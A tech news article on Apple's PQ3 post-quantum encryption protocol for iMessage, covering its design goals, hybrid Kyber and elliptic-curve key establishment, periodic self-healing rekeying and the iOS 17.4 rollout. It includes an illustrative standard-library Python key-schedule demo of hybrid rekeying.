    When iMessage launched in 2011, it became the first widely available messaging app with default end-to-end encryption. Over the years, Apple has continually enhanced its security features. In 2019, the iPhone maker bolstered its cryptographic protocol by transitioning from RSA to elliptic curve cryptography (ECC) and safeguarding encryption keys within the secure enclave, increasing protection against sophisticated attacks. 

    “Additionally, we implemented a periodic rekey mechanism for cryptographic self-healing in case of key compromise. These advancements underwent rigorous formal verification, ensuring the robustness of our security measures,” the blog post reads. The cryptographic community has been developing post-quantum cryptography (PQC) to address the threat of future quantum computers. These new public key algorithms can run on today’s classical computers without requiring quantum technology. 

    Designing PQ3

    Designing PQ3 involved rebuilding the iMessage cryptographic protocol to enhance end-to-end encryption, meeting specific goals:

    1. Post-quantum cryptography: PQ3 protects all communication from current and future adversaries by introducing post-quantum cryptography from the start of a conversation.
    2. Mitigating key compromises: It reduces the damage from a key compromise by bounding how many past and future messages a single compromised key can decrypt.
    3. Hybrid design: PQ3 combines new post-quantum algorithms with the current elliptic curve algorithms, so the new protocol is never less safe than the existing classical one.
    4. Amortized message size: PQ3 spreads the extra key material across messages so that the added security does not impose excessive overhead on any single message.
    5. Formal verification: PQ3 is analysed with formal verification methods to provide strong security assurances.

    According to Apple, PQ3 introduces a new post-quantum encryption key during iMessage registration, using Kyber post-quantum public keys. These keys are used for initial key establishment, enabling sender devices to generate post-quantum encryption keys for the first message, even if the receiver is offline.

    Furthermore, PQ3 implements a periodic post-quantum rekeying mechanism within conversations to self-heal from key compromise and protect future messages. Each rekey creates fresh message encryption keys that adversaries cannot compute from past keys.

    The protocol uses a hybrid design, combining elliptic curve cryptography with post-quantum encryption during both initial key establishment and rekeying. Rekeying involves transmitting fresh public key material inline with encrypted messages, with the frequency of rekeying balanced to preserve user experience and server infrastructure capacity.

    PQ3 continues to rely on classical cryptographic algorithms for sender authentication and key verification. Attacks on these classical mechanisms would require contemporaneous access to a quantum computer and, unlike attacks on encryption, cannot be performed retroactively on stored traffic. Apple noted that future assessments will evaluate the need for post-quantum authentication as quantum computing threats evolve.
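    To make the hybrid key establishment and self-healing rekey ideas above concrete, here is an added illustrative key schedule written for this page. It is not Apple's PQ3 code and does not implement Kyber or elliptic curve Diffie-Hellman: the classical and post-quantum shared secrets are stood in for by random bytes, and the HKDF labels, chain layout and the `hybrid_combine` and `Chain` names are assumptions made for the example. What it does show is that a session key derived from both secrets cannot be recovered from either alone, and that a chain key captured before a rekey does not yield the keys issued after it.

```python
"""
Illustrative hybrid key schedule with periodic rekeying (standard library only).

Example code for this page, not Apple's PQ3 implementation. The "classical"
and "post-quantum" shared secrets are random stand-ins for ECDH and Kyber
outputs; the derivation labels are made up for the example.
"""
import hashlib
import hmac
import os

HASH = hashlib.sha256


def hkdf(ikm, salt, info, length=32):
    """HKDF (RFC 5869) extract-then-expand using HMAC-SHA256."""
    prk = hmac.new(salt, ikm, HASH).digest()
    okm, block, counter = b"", b"", 1
    while len(okm) < length:
        block = hmac.new(prk, block + info + bytes([counter]), HASH).digest()
        okm += block
        counter += 1
    return okm[:length]


def hybrid_combine(classical_ss, pq_ss, prev_chain_key):
    """Derive a chain key from BOTH shared secrets and the previous chain key.

    Because both secrets feed the extract step, an attacker who breaks only
    the classical part (or only the post-quantum part) cannot recompute it."""
    return hkdf(classical_ss + pq_ss, salt=prev_chain_key, info=b"example-hybrid-rekey")


class Chain:
    """Symmetric ratchet: each message key is derived from the current chain
    key, which is then advanced one-way so a later chain key does not reveal
    earlier message keys."""

    def __init__(self, chain_key):
        self.chain_key = chain_key

    def next_message_key(self):
        mk = hkdf(self.chain_key, salt=b"", info=b"example-message-key")
        self.chain_key = hkdf(self.chain_key, salt=b"", info=b"example-chain-advance")
        return mk

    def rekey(self, classical_ss, pq_ss):
        """Self-healing step: mix fresh shared secrets into the chain."""
        self.chain_key = hybrid_combine(classical_ss, pq_ss, self.chain_key)


def fresh_secrets():
    """Stand-ins for a fresh ECDH shared secret and a fresh KEM shared secret."""
    return os.urandom(32), os.urandom(32)


def demo():
    """Run a session, snapshot its chain key as an attacker would, rekey, and
    report whether the snapshot still yields the live message keys."""
    ecdh0, pq0 = fresh_secrets()
    root = b"\x00" * 32  # initial salt for the first derivation (assumption)
    alice = Chain(hybrid_combine(ecdh0, pq0, root))
    bob = Chain(hybrid_combine(ecdh0, pq0, root))
    assert alice.next_message_key() == bob.next_message_key()

    # Compromise: the attacker copies Alice's chain key at this moment.
    attacker = Chain(alice.chain_key)
    k2 = alice.next_message_key()
    bob.next_message_key()
    attacker_k2 = attacker.next_message_key()  # same chain key, so it matches

    # Rekey with fresh secrets the attacker never observed.
    ecdh1, pq1 = fresh_secrets()
    alice.rekey(ecdh1, pq1)
    bob.rekey(ecdh1, pq1)
    k3 = alice.next_message_key()
    assert k3 == bob.next_message_key()
    attacker_k3 = attacker.next_message_key()  # stale chain, no longer matches

    return {"before_rekey_exposed": attacker_k2 == k2,
            "after_rekey_exposed": attacker_k3 == k3}


if __name__ == "__main__":
    print(demo())
```

    The window of exposure is exactly the interval between the compromise and the next rekey, which is why the frequency of rekeying is a tuning knob: more frequent rekeys shrink that window at the cost of more key material on the wire.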

    A man uses an Apple iPhone in Beijing on September 12, 2023. (Photo by Pedro PARDO/AFP).

    Why PQ3 on iMessage matters for iPhone Users

    Integrating PQ3 into iMessage signifies a huge leap forward in privacy and security for iPhone users. With the exponential growth of data and the looming specter of quantum computing, traditional encryption methods face unprecedented challenges. PQ3 mitigates these risks by providing quantum-resistant protection, ensuring that your conversations remain shielded from future threats. 

    PQ3’s implementation in iMessage demonstrates Apple’s interest in safeguarding user privacy and staying ahead of emerging security threats. Beyond its robust encryption capabilities, PQ3 introduces a host of additional security features designed to enhance the overall integrity of iMessage. These include secure key establishment mechanisms, cryptographic self-healing protocols, and real-time threat detection capabilities.

    By incorporating these advanced security measures, Apple hopes to ensure that iMessage remains a bastion of privacy in an increasingly interconnected world.

    When can iPhone users expect the update?

    Support for PQ3 will begin with the public releases of iOS 17.4, iPadOS 17.4, macOS 14.4, and watchOS 10.4. Already available in developer previews and beta releases, PQ3 will automatically elevate the security of iMessage conversations between devices that support the protocol. As Apple gains operational experience with PQ3 globally, it will gradually replace the existing protocol within all sustained conversations throughout the year.
